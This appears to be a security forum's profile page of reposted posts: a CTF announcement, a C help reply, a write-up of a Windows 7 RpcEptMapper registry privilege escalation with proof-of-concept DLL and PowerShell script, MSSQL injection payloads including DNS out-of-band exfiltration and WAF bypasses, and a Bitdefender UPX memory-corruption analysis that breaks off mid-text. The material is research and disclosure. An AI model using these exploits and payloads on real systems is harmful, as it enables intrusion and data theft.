Jump to content

Nytro

Administrators
  • Posts

    18707
  • Joined

  • Last visited

  • Days Won

    700

Everything posted by Nytro

  1. 20 noiembrie 2020 10:00 - 18:00 Premiile pentru concurs: Locul I - 3000 RON Locul II - 2000 RON Locul III - 1000 RON Cel mai bun write-up - 500 RON Premiile sunt oferite din donații de la membrii comunității: Nytro, malsploit, Dragos, dancezar, Matasareanu. Trecem printr-o perioadă grea și sugestia noastră este ca premiile să fie donate, dacă acest lucru este posibil. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Slack. Prezentarea rezultatelor concursului va avea loc la ora 18:00. Detalii complete: https://ctf.rstcon.com/
  2. Adica din "abcde" sa faci "adcbe"? Poti folosi strlen? Daca nu, il poti implementa cu un while: char sir[] = "abcde"; unsigned int length = 0; while(sir[length++]) {} // Cred, facut acum rapid Apoi inlocuiesc elementul 2 cu penultimul, adica: char x = sir[2]; // Temporar salvezi al doilea caracter sir[2] = sir[len-2]; // Inlocuiesti al doilea caracter cu penultimul sir[len-2 = x; // Penultimul apoi cu al doilea Nu stiu daca e exact asa sau daca de asta ai nevoie. Probabil ai nevoie si de un "if" sa vezi daca sirul are mai mult de 2 caractere.
  3. Parameter pollution is a very old attack however I feel like it is under rated. 20+ JS libraries were vulnerable to this attack including JQuery. This is an important attack to learn for any web application pentester. There are few automated tools which are able to detect this however, it does require manual inspection. Facebook: https://www.facebook.com/InfoSecForSt... Vuln JS: https://gist.github.com/DaniAkash/b3d... Affected library: https://www.npmjs.com/package/lodash ... Example Test Code: https://github.com/lukeed/klona/pull/... References: https://portswigger.net/daily-swig/pr... https://codeburst.io/what-is-prototyp... https://medium.com/node-modules/what-... https://help.semmle.com/wiki/display/... https://research.securitum.com/protot... #webapppentest #ethicalhacking #burpsuite #pentest #cybersecurity #cybersecuritytraining
  4. Windows RpcEptMapper Service Insecure Registry Permissions EoP November 12, 2020 If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding… A Bit of Context… At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations but, it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008R2! Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts. Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of the that service and make it run an arbitrary executable. Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service. Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked. Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought… Checking Registry Permissions One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath. Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all. When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2. When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this: Since I didn’t expect the script to yield any result, I frst thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results… A False Positive? According to the output of the script, the current user has some write permissions on two registry keys: HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account. Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey. The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script: Name : RpcEptMapper ImagePath : C:\Windows\system32\svchost.exe -k RPCSS User : NT AUTHORITY\NetworkService ModifiablePath : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper} IdentityReference : NT AUTHORITY\Authenticated Users Permissions : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory} Status : Running UserCanStart : True UserCanRestart : False Name : RpcEptMapper ImagePath : C:\Windows\system32\svchost.exe -k RPCSS User : NT AUTHORITY\NetworkService ModifiablePath : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper} IdentityReference : BUILTIN\Users Permissions : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory} Status : Running UserCanStart : True UserCanRestart : False What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey. Does it mean that it was indeed a false positive? Surely not. Let the fun begin! RTFM At this point, we know that we can create arbirary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services. Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security- that we could leverage to effectively modify the configuration of the service and alter its behavior in any way? To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out. Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there. Still, I did take a quick look at each paragraph. And, I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Perfomance”, we can read the following: Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file. According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performances thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service so it looks like it is exactly what we need. There is a slight problem though, this service is definitely not a driver service. Anyway, it’s still worth the try, but we need more information about this “Perfomance Monitoring” feature first. Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256). After some googling, I found this resource in the documentation: Creating the Application’s Performance Key. First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information: The Library value can contain a DLL name or a full path to a DLL. The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL. The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value). If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData. DWORD APIENTRY OpenPerfData(LPWSTR pContext); DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); DWORD APIENTRY ClosePerfData(); I think that’s enough with the theory, it’s time to start writing some code! Writing a Proof-of-Concept Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan! When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed. In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app. Here is the initial code generated by Visual Studio: #include <iostream> int main() { std::cout << "Hello World!\n"; } Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL. #include <Windows.h> extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved) { switch (reason) { case DLL_PROCESS_ATTACH: Log(L"DllMain"); // See log helper function below break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally. Next, I add my custom log helper function. #include <Lmcons.h> // UNLEN + GetUserName #include <tlhelp32.h> // CreateToolhelp32Snapshot() #include <strsafe.h> void Log(LPCWSTR pwszCallingFrom) { LPWSTR pwszBuffer, pwszCommandLine; WCHAR wszUsername[UNLEN + 1] = { 0 }; SYSTEMTIME st = { 0 }; HANDLE hToolhelpSnapshot; PROCESSENTRY32 stProcessEntry = { 0 }; DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0; BOOL bResult = FALSE; // Get the command line of the current process pwszCommandLine = GetCommandLine(); // Get the name of the process owner GetUserName(wszUsername, &dwPcbBuffer); // Get the PID of the current process dwProcessId = GetCurrentProcessId(); // Get the PID of the parent process hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); stProcessEntry.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hToolhelpSnapshot, &stProcessEntry)) { do { if (stProcessEntry.th32ProcessID == dwProcessId) { dwParentProcessId = stProcessEntry.th32ParentProcessID; break; } } while (Process32Next(hToolhelpSnapshot, &stProcessEntry)); } CloseHandle(hToolhelpSnapshot); // Get the current date and time GetLocalTime(&st); // Prepare the output string and log the result dwBufSize = 4096 * sizeof(WCHAR); pwszBuffer = (LPWSTR)malloc(dwBufSize); if (pwszBuffer) { StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n", st.wHour, st.wMinute, st.wSecond, dwProcessId, dwParentProcessId, wszUsername, pwszCommandLine, pwszCallingFrom ); LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer); free(pwszBuffer); } } Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful. DWORD APIENTRY OpenPerfData(LPWSTR pContext) { Log(L"OpenPerfData"); return ERROR_SUCCESS; } DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned) { Log(L"CollectPerfData"); return ERROR_SUCCESS; } DWORD APIENTRY ClosePerfData() { Log(L"ClosePerfData"); return ERROR_SUCCESS; } Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code. extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); If you want to see the full code, I uploaded it here. Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll. Testing the PoC Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters. C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! [21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain' [21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData' Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have. Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell. [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance") Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up. $ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance" Write-Host "[*] Create 'Performance' subkey" [void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey) Write-Host "[*] Create 'Library' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Open' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Collect' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Close' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null Read-Host -Prompt "Press any key to continue" Write-Host "[*] Cleanup" Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force [Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey) The last step now, how do we trick the RPC Endpoint Mapper service into loading our Performace DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time consuming research can sometimes be. Anyway, one thing I found along the way is that you can query Perfomance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types. Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes. So, I first enumerated the WMI classes that are related to Performace Data in PowerShell using the following command. Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" } And, I saw that my log file was created almost right away! Here is the content of the file. [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' I expected to get arbitary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most but, it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! Note: if I had got arbirary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much. I also tried to get each WMI class separately and I observed the exact same result. Get-WmiObject Win32_Perf Get-WmiObject Win32_PerfRawData Get-WmiObject Win32_PerfFormattedData Conclusion I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration. I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the GetModfiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries. Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Perfomance” registry setting opens up really interesting opportunities for post exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?… Links & Resources GitHub - PrivescCheck https://github.com/itm4n/PrivescCheck GitHub - PowerUp https://github.com/HarmJ0y/PowerUp Microsoft - “HKLM\SYSTEM\CurrentControlSet\Services Registry Tree” https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree Microsoft - Creating the Application’s Performance Key https://docs.microsoft.com/en-us/windows/win32/perfctrs/creating-the-applications-performance-key Sursa: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
  5. Advanced MSSQL Injection Tricks Written by PT SWARM Team on November 12, 2020 PT SWARM Team ptswarm We compiled a list of several techniques for improved exploition of MSSQL injections. All the vectors have been tested on at least three of the latest versions of Microsoft SQL Server: 2019, 2017, 2016SP2. DNS Out-of-Band If confronted with a fully blind SQL injection with disabled stacked queries, it’s possible to attain DNS out-of-band (OOB) data exfiltration via the functions fn_xe_file_target_read_file, fn_get_audit_file, and fn_trace_gettable. fn_xe_file_target_read_file() example: https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)) Permissions: Requires VIEW SERVER STATE permission on the server. fn_get_audit_file() example: https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default))) Permissions: Requires the CONTROL SERVER permission. fn_trace_gettable() example: https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default)) Permissions: Requires the CONTROL SERVER permission. Alternative Error-Based vectors Error-based SQL injections typically resemble constructions such as «+AND+1=@@version–» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data. Some examples of such functions: SUSER_NAME() USER_NAME() PERMISSIONS() DB_NAME() FILE_NAME() TYPE_NAME() COL_NAME() Example use of function USER_NAME(): https://vuln.app/getItem?id=1'%2buser_name(@@version)-- Quick exploitation: Retrieve an entire table in one query There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it. The query to retrieve the schema, tables and columns from the current database: https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto-- Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON. https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)-- Reading local files An example of retrieving a local file C:\Windows\win.ini using the function OpenRowset(): https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null Error-based vector: https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission. Retrieving the current query The current SQL query being executed can be retrieved from access sys.dm_exec_requests and sys.dm_exec_sql_text: https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null Permissions: If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session. Little tricks for WAF bypasses Non-standard whitespace characters: %C2%85 или %C2%A0: https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null-- Scientific (0e) and hex (0x) notation for obfuscating UNION: https://vuln.app/getItem?id=0eunion+select+null,@@version,null-- https://vuln.app/getItem?id=0xunion+select+null,@@version,null-- A period instead of a whitespace between FROM and a column name: https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users-- \N seperator between SELECT and a throwaway column: https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users-- Sursa: https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
  6. November 10, 2020 Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions This post breaks the two-year silence of this blog, showcasing a selection of memory corruption vulnerabilities in Bitdefender’s anti-virus engine. Introduction The goal of binary packing is to compress or obfuscate a binary, usually to save space/bandwidth or to evade malware analysis. A packed binary typically contains a compressed/obfuscated data payload. When the binary is executed, a loader decompresses this payload and then jumps to the actual entry point of the (inner) binary. Most anti-virus engines support binary unpacking at least for packers (such as UPX) that are very popular and that are also used by non-malware software. This blog post is about UPX unpacking of PE binaries in the Bitdefender core engine. The main steps in UPX unpacking of PE binary files are the following: Detect the loader from the entry point Find the compressed data payload and extract it Unfilter the extracted code Rebuild various structures (such as the import table, the relocation table, the export table, and the resources) The following vulnerabilities are presented in the control-flow order of the UPX unpacker. Disclaimer: In the following, decompiled code from Bitdefender’s core engine is presented. The naming of variables, fields, and macros is heavily inspired by the original UPX. For some snippets, a reference to the original function is added for comparison. It is likely that some types are incorrect. //1//: Stack Buffer Overflow in Pre-Extraction Deobfuscation After the UPX loader has been detected, the Bitdefender engine tries to detect whether the loader applies a specific kind of deobfuscation to the compressed data payload before extracting it. The (de)obfuscation is very simple, making only use of the three operations ADD, XOR, and ROTATE_LEFT. If this deobfuscation is detected, then the engine iterates through the corresponding instructions of the loader and parses them with their operands in order to be able to deobfuscate the data as well. This looks as follows: int32_t operation[16]; // on the stack int32_t operand[16]; // on the stack int i = 0; int pos = 0; do { bool op_XOR_or_ADD = false; if (loaderdata[pos] == 0x81u && (loaderdata[pos + 1] == 0x34 || loaderdata[pos + 1] == 0x4)) { operation[i] = (loaderdata[pos + 1] == 0x34) ? OP_XOR : OP_ADD; operand[i] = *(int32_t *)&loaderdata[pos + 3]; ++i; pos += 7; op_XOR_or_ADD = true; } } if (loaderdata[pos] == 0xC1u && loaderdata[pos + 1] == 4) { operation[i] = OP_ROTATE_LEFT; operand[i] = loaderdata[pos + 3]; ++i; pos += 4; if (i == 16) break; continue; } if (op_XOR_or_ADD) { if (i == 16) break; continue; } if (loaderdata[pos] == 0xE2u) { /* omitted: apply collected operations */ } pos += 2; } while (pos + SOME_SLACK < loaderdata_end); Observe how the bound-check on the index variable i is performed. As the buffer loaderdata is fully attacker-controlled, it is easy to verify that we can increase the index variable i by two before running into one of the checks i == 16. In particular, we can increase i from 15 to 17, after which we can overwrite the stack with completely arbitrary data. (10ec.12dc): Break instruction exception - code 80000003 (first chance) 00000000`0601fe42 cc int 3 The debug break is due to the stack canary which we have overwritten. If we continue, we see that the return fails because the stack is corrupted. 0:000> g (10ec.12dc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`06006603 c3 ret 0:000> dd rsp 00000000`0014ed98 deadbeef deadbeef deadbeef deadbeef 00000000`0014eda8 deadbeef deadbeef deadbeef deadbeef //2//: Heap Buffer Overflow in Pre-Extraction Deobfuscation The collected operations (for the deobfuscation shown in //1//) are applied to the payload buffer at an attacker-controlled offset write_offset. Obviously, this offsets needs to be checked before writing to it. There are two checks on write_offset. The first is if (write_offset <= extractobj->dword10 + 3) and the second one is if (loaderdata[pos] == 0xE2u) { if (write_offset >= extractobj->dword10 - 3) Both checks test against the field dword10. The field dword10, sitting on the calling functions’s stack frame, is never initialized. This makes the bound check useless and introduces a fully attacker-controlled heap buffer overflow. //3//: Heap Buffer Overflow in Post-Extraction Deobfuscation After the extraction, the engine attempts to deobfuscate the extracted data with a static XOR key. for(int i=0; i<0x300; i++) { if (*(int32_t *)&entrypoint_data[i] == 0x4243484B) { int32_t j = i + 0x4A; uint8_t xor_key = entrypoint_data[j]; // attacker-controlled int32_t xor_len = *(int32_t *)&entrypoint_data[j - 7]; // attacker-controlled if (xor_len > packer->set_to_size_of_rawdata) return j; // <-- wrong bound check for(int32_t k=0; k<xor_len; k++) { packer->extracted_data[k] ^= xor_key; // <-- oob write } *info_string = "encrypted"; } } The bound check is completely wrong. It should check against the size of the extracted data buffer. Instead, it checks against a value that is previously set to the raw data size of the section we extracted the data from. Those two sizes have nothing to do with each other. In particular, one can be much smaller than the other, or vice-versa. As the function does not return after the first deobfuscation run, the memory corruption can be triggered up to 0x300 times in a row. This allows us to bypass the limitation that in a single 